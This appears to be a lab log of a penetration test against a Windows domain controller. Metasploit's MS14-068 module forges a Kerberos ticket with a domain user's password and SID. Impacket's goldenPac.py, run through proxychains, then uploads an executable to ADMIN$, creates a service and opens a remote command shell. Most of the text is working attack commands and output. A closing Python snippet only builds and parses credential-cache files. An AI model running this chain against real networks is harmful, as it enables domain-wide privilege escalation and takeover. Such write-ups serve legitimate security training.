- msf auxiliary(socks4a) > use auxiliary/admin/kerberos/ms14_068_kerberos_checksum
- msf auxiliary(ms14_068_kerberos_checksum) > show info
- Name: MS14-068 Microsoft Kerberos Checksum Validation Vulnerability
- Module: auxiliary/admin/kerberos/ms14_068_kerberos_checksum
- License: Metasploit Framework License (BSD)
- Rank: Normal
- Disclosed: 2014-11-18
- Provided by:
- Tom Maddock
- Sylvain Monne
- juan vazquez <juan.vazquez@metasploit.com>
- Basic options:
- Name Current Setting Required Description
- ---- --------------- -------- -----------
- DOMAIN yes The Domain (upper case) Ex: DEMO.LOCAL
- PASSWORD yes The Domain User password
- RHOST yes The target address
- RPORT 88 yes The target port
- Timeout 10 yes The TCP timeout to establish connection and read data
- USER yes The Domain User
- USER_SID yes The Domain User SID, Ex: S-1-5-21-1755879683-3641577184-3486455962-1000
- Description:
- This module exploits a vulnerability in the Microsoft Kerberos
- implementation. The problem exists in the verification of the
- Privilege Attribute Certificate (PAC) from a Kerberos TGS request,
- where a domain user may forge a PAC with arbitrary privileges,
- including Domain Administrator. This module requests a TGT ticket
- with a forged PAC and exports it to a MIT Kerberos Credential Cache
- file. It can be loaded on Windows systems with the Mimikatz help. It
- has been tested successfully on Windows 2008.
- References:
- https://cvedetails.com/cve/CVE-2014-6324/
- https://technet.microsoft.com/en-us/library/security/MS14-068
- OSVDB (114751)
- http://blogs.technet.com/b/srd/archive/2014/11/18/additional-information-about-cve-2014-6324.aspx
- https://labs.mwrinfosecurity.com/blog/2014/12/16/digging-into-ms14-068-exploitation-and-defence/
- https://github.com/bidord/pykek
- https://community.rapid7.com/community/metasploit/blog/2014/12/25/12-days-of-haxmas-ms14-068-now-in-metasploit
- msf auxiliary(ms14_068_kerberos_checksum) > set DOMAIN contoso-west.org
- DOMAIN => contoso-west.org
- msf auxiliary(ms14_068_kerberos_checksum) > set RHOST 10.0.0.149
- RHOST => 10.0.0.149
- msf auxiliary(ms14_068_kerberos_checksum) > set USER blot
- USER => blot
- msf auxiliary(ms14_068_kerberos_checksum) > set user_sid S-1-5-21-3039018489-1111549232-2925702125-1109
- user_sid => S-1-5-21-3039018489-1111549232-2925702125-1109
- msf auxiliary(ms14_068_kerberos_checksum) > show options
- Module options (auxiliary/admin/kerberos/ms14_068_kerberos_checksum):
- Name Current Setting Required Description
- ---- --------------- -------- -----------
- DOMAIN CONTOSO-WEST yes The Domain (upper case) Ex: DEMO.LOCAL
- PASSWORD yes The Domain User password
- RHOST 10.0.0.149 yes The target address
- RPORT 88 yes The target port
- Timeout 10 yes The TCP timeout to establish connection and read data
- USER blot yes The Domain User
- USER_SID S-1-5-21-3039018489-1111549232-2925702125-1109 yes The Domain User SID, Ex: S-1-5-21-1755879683-3641577184-3486455962-1000
- msf auxiliary(ms14_068_kerberos_checksum) > set PASSWORD Bl0tt12309-
- PASSWORD => Bl0tt12309-
- msf auxiliary(ms14_068_kerberos_checksum) > show options
- Module options (auxiliary/admin/kerberos/ms14_068_kerberos_checksum):
- Name Current Setting Required Description
- ---- --------------- -------- -----------
- DOMAIN CONTOSO-WEST yes The Domain (upper case) Ex: DEMO.LOCAL
- PASSWORD Bl0tt12309- yes The Domain User password
- RHOST 10.0.0.149 yes The target address
- RPORT 88 yes The target port
- Timeout 10 yes The TCP timeout to establish connection and read data
- USER blot yes The Domain User
- USER_SID S-1-5-21-3039018489-1111549232-2925702125-1109 yes The Domain User SID, Ex: S-1-5-21-1755879683-3641577184-3486455962-1000
- msf auxiliary(ms14_068_kerberos_checksum) > run
- [*] Validating options...
- [*] Using domain CONTOSO-WEST...
- [*] 10.0.0.149:88 - Sending AS-REQ...
- [*] 10.0.0.149:88 - Parsing AS-REP...
- [*] 10.0.0.149:88 - Sending TGS-REQ...
- [!] 10.0.0.149:88 - KRB_AP_ERR_BADMATCH - Ticket and authenticator don't match
- [-] 10.0.0.149:88 - Invalid TGS-REP, aborting...
- [*] Auxiliary module execution completed
- msf auxiliary(ms14_068_kerberos_checksum) > set domain contoso-west.org
- domain => contoso-west.org
- msf auxiliary(ms14_068_kerberos_checksum) > run
- [*] Validating options...
- [*] Using domain CONTOSO-WEST.ORG...
- [*] 10.0.0.149:88 - Sending AS-REQ...
- [*] 10.0.0.149:88 - Parsing AS-REP...
- [*] 10.0.0.149:88 - Sending TGS-REQ...
- [+] 10.0.0.149:88 - Valid TGS-Response, extracting credentials...
- [+] 10.0.0.149:88 - MIT Credential Cache saved on /root/.msf4/loot/20181109211513_default_10.0.0.149_windows.kerberos_173395.bin
- [*] Auxiliary module execution completed
- proxychains net rpc -W contoso-west.org -U blot -S 10.0.0.149 shell
- ProxyChains-3.1 (http://proxychains.sf.net)
- Enter blot's password:
- |S-chain|-<>-127.0.0.1:1099-<><>-10.0.0.149:445-<><>-OK
- Talking to domain CONTOSO-WEST (S-1-5-21-3039018489-1111549232-2925702125)
- net rpc> user
- net rpc user> show
- Usage: net rpc user show <username>
- net rpc user show failed: NT_STATUS_INVALID_PARAMETER
- net rpc user> show blot
- user rid: 1109, group rid: 513
- net rpc user> packet_write_wait: Connection to 2001:700:300:7::85 port 22: Broken pipe
- msf auxiliary(ms14_068_kerberos_checksum) > set DOMAIN contoso-west.org
- DOMAIN => CONTOSO-WEST
- msf auxiliary(ms14_068_kerberos_checksum) > set RHOST 10.0.0.149
- RHOST => 10.0.0.149
- msf auxiliary(ms14_068_kerberos_checksum) > set USER blot
- USER => blot
- msf auxiliary(ms14_068_kerberos_checksum) > set user_sid S-1-5-21-3039018489-1111549232-2925702125-1109
- user_sid => S-1-5-21-3039018489-1111549232-2925702125-1109
- msf auxiliary(ms14_068_kerberos_checksum) > set PASSWORD Bl0tt12309-
- msf auxiliary(ms14_068_kerberos_checksum) > show options
- Module options (auxiliary/admin/kerberos/ms14_068_kerberos_checksum):
- Name Current Setting Required Description
- ---- --------------- -------- -----------
- DOMAIN contoso-west.org yes The Domain (upper case) Ex: DEMO.LOCAL
- PASSWORD Bl0tt12309- yes The Domain User password
- RHOST 10.0.0.149 yes The target address
- RPORT 88 yes The target port
- Timeout 10 yes The TCP timeout to establish connection and read data
- USER blot yes The Domain User
- USER_SID S-1-5-21-3039018489-1111549232-2925702125-1109 yes The Domain User SID, Ex: S-1-5-21-1755879683-3641577184-3486455962-1000
- msf auxiliary(ms14_068_kerberos_checksum) > run
- [*] Validating options...
- [*] Using domain CONTOSO-WEST.ORG...
- [*] 10.0.0.149:88 - Sending AS-REQ...
- [*] 10.0.0.149:88 - Parsing AS-REP...
- [*] 10.0.0.149:88 - Sending TGS-REQ...
- [+] 10.0.0.149:88 - Valid TGS-Response, extracting credentials...
- [+] 10.0.0.149:88 - MIT Credential Cache saved on /root/.msf4/loot/20181109211513_default_10.0.0.149_windows.kerberos_173395.bin
- [*] Auxiliary module execution completed
- root@10-kali2-group10:~/.msf4/loot# ls
- 20181010173151_default_192.168.40.14_192.168.40.14_ce_775643.crt
- 20181010173151_default_192.168.40.14_192.168.40.14_ke_958653.key
- 20181010173151_default_192.168.40.14_192.168.40.14_pe_462147.pem
- 20181109211513_default_10.0.0.149_windows.kerberos_173395.bin
- root@10-kali2-group10:~/.msf4/loot#
- To use this ticket, which is in the MIT Credential Cache (ccache) format, we move it into /tmp, where the Kerberos tools look for credential caches by default.
- root@10-kali2-group10:~/.msf4/loot# mv 20181109211513_default_10.0.0.149_windows.kerberos_173395.bin /tmp/krb5cc
- Edited /etc/krb5.conf (with nano) and added a realm definition plus a domain-to-realm mapping:
- [realms]
- CONTOSO-WEST.ORG = {
- kdc = dc2008r2-group1
- admin_server = dc2008r2-group1
- default_domain = CONTOSO-WEST
- }
- [domain_realm]
- # realm names are case-sensitive: the mapping must name the realm exactly as defined in [realms]
- .contoso-west.org = CONTOSO-WEST.ORG
- contoso-west.org = CONTOSO-WEST.ORG
- proxychains python2.7 examples/goldenPac.py -dc-ip 10.0.0.149 -target-ip 10.0.0.149 CONTOSO-WEST.org/Blot@dc2008r2-group1.CONTOSO-WEST.org
- ProxyChains-3.1 (http://proxychains.sf.net)
- Impacket v0.9.18-dev - Copyright 2018 SecureAuth Corporation
- Password:Bl0tt12309-
- |S-chain|-<>-127.0.0.1:1099-<><>-10.0.0.149:445-<><>-OK
- [*] User SID: S-1-5-21-3039018489-1111549232-2925702125-1109
- |S-chain|-<>-127.0.0.1:1099-<><>-10.0.0.149:445-<><>-OK
- |DNS-request| contoso-west.org
- |S-chain|-<>-127.0.0.1:1099-<><>-4.2.2.2:53-<><>-OK
- |DNS-response|: contoso-west.org does not exist
- [-] Couldn't get forest info ([Errno Connection error (contoso-west.org:445)] [Errno 1] Unknown error), continuing
- [*] Attacking domain controller 10.0.0.149
- |S-chain|-<>-127.0.0.1:1099-<><>-10.0.0.149:88-<><>-OK
- |S-chain|-<>-127.0.0.1:1099-<><>-10.0.0.149:88-<><>-OK
- |S-chain|-<>-127.0.0.1:1099-<><>-10.0.0.149:88-<><>-OK
- |S-chain|-<>-127.0.0.1:1099-<><>-10.0.0.149:88-<><>-OK
- [*] 10.0.0.149 found vulnerable!
- |S-chain|-<>-127.0.0.1:1099-<><>-10.0.0.149:445-<><>-OK
- [*] Requesting shares on 10.0.0.149.....
- [*] Found writable share ADMIN$
- [*] Uploading file UApVHfro.exe
- [*] Opening SVCManager on 10.0.0.149.....
- [*] Creating service TGOJ on 10.0.0.149.....
- [*] Starting service TGOJ.....
- |S-chain|-<>-127.0.0.1:1099-<><>-10.0.0.149:445-<><>-OK
- |S-chain|-<>-127.0.0.1:1099-<><>-10.0.0.149:445-<><>-OK
- [!] Press help for extra shell commands
- |S-chain|-<>-127.0.0.1:1099-<><>-10.0.0.149:445-<><>-OK
- Microsoft Windows [Version 6.1.7601]
- Copyright (c) 2009 Microsoft Corporation. All rights reserved.
- C:\Windows\system32>ipconfig
- Windows IP Configuration
- Ethernet adapter Local Area Connection:
- Connection-specific DNS Suffix . :
- IPv4 Address. . . . . . . . . . . : 10.0.0.149
- Subnet Mask . . . . . . . . . . . : 255.255.255.240
- Default Gateway . . . . . . . . . : 10.0.0.145
- Tunnel adapter isatap.{E58D4114-3C3A-46FD-AEAD-ECA142ED8636}:
- Media State . . . . . . . . . . . : Media disconnected
- Connection-specific DNS Suffix . :
- C:\Windows\system32>
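To check what a saved cache such as the loot file moved to /tmp/krb5cc above actually holds (default principal, service principal, ticket flags, ticket size) without relying on the Kerberos tools, here is an added example, not code from the page or from Metasploit, that reads the MIT ccache file format version 4 layout. The SAMPLE cache is constructed inline with the session's principal names (CONTOSO-WEST.ORG, blot) and a dummy key and ticket; the field order follows the MIT ccache format documentation.

```python
import struct

def _cstr(b):                # counted_octet_string: 4-byte big-endian length + data
    return struct.pack(">I", len(b)) + b
def _principal(realm, *components, name_type=1):
    out = struct.pack(">II", name_type, len(components)) + _cstr(realm.encode())
    return out + b"".join(_cstr(c.encode()) for c in components)

def build_ccache(default, creds):   # minimal ccache v4: magic 0x0504, header, principal, creds
    hdr = struct.pack(">HHii", 1, 8, 0, 0)                    # header tag 1 = DeltaTime (8 bytes)
    out = b"\x05\x04" + struct.pack(">H", len(hdr)) + hdr + _principal(*default)
    for client, server, flags, ticket in creds:
        out += _principal(*client) + _principal(*server)
        out += struct.pack(">H", 23) + _cstr(b"\x00" * 16)    # keyblock: enctype 23 (RC4-HMAC), key
        out += struct.pack(">IIII", 1, 1, 2, 3)                # authtime, starttime, endtime, renew_till
        out += b"\x00" + struct.pack(">III", flags, 0, 0)      # is_skey, ticket_flags, 0 addrs, 0 authdata
        out += _cstr(ticket) + _cstr(b"")                      # ticket, second_ticket
    return out

class _Reader:
    def __init__(self, data): self.data, self.pos = data, 0
    def take(self, n):
        if self.pos + n > len(self.data): raise ValueError("truncated ccache")
        self.pos += n; return self.data[self.pos - n:self.pos]
    def u(self, fmt): return struct.unpack(fmt, self.take(struct.calcsize(fmt)))[0]
    def cstr(self): return self.take(self.u(">I"))
    def principal(self):
        self.u(">I"); n = self.u(">I")                         # name_type, num_components
        realm = self.cstr().decode()
        return "/".join(self.cstr().decode() for _ in range(n)) + "@" + realm

def parse_ccache(data):              # returns (default principal, list of credential dicts)
    r = _Reader(data)
    if r.take(2) != b"\x05\x04": raise ValueError("only ccache format version 4 is handled")
    r.take(r.u(">H"))                                          # skip header fields
    default, creds = r.principal(), []
    while r.pos < len(data):
        client, server = r.principal(), r.principal()
        r.u(">H"); r.cstr()                                    # keyblock: enctype, key data
        times = struct.unpack(">IIII", r.take(16))             # authtime, starttime, endtime, renew_till
        r.take(1); flags = r.u(">I")                           # is_skey, ticket_flags
        for _ in range(r.u(">I")): r.u(">H"); r.cstr()         # addresses
        for _ in range(r.u(">I")): r.u(">H"); r.cstr()         # authdata
        ticket = r.cstr(); r.cstr()                            # ticket, second_ticket
        creds.append({"client": client, "server": server, "endtime": times[2],
                      "forwardable": bool(flags & 0x40000000), "ticket_len": len(ticket)})
    return default, creds

# Constructed sample, not the loot file from the session: one TGT-style entry for blot,
# flags = forwardable | renewable | initial | pre_authent, 40 dummy ticket bytes
SAMPLE = build_ccache(("CONTOSO-WEST.ORG", "blot"), [(("CONTOSO-WEST.ORG", "blot"),
    ("CONTOSO-WEST.ORG", "krbtgt", "CONTOSO-WEST.ORG"), 0x40E00000, b"\x61" * 40)])
```

Feeding the bytes of a real cache file such as /tmp/krb5cc to parse_ccache lists the same principals and flags that klist shows, and a truncated file raises instead of returning partial entries.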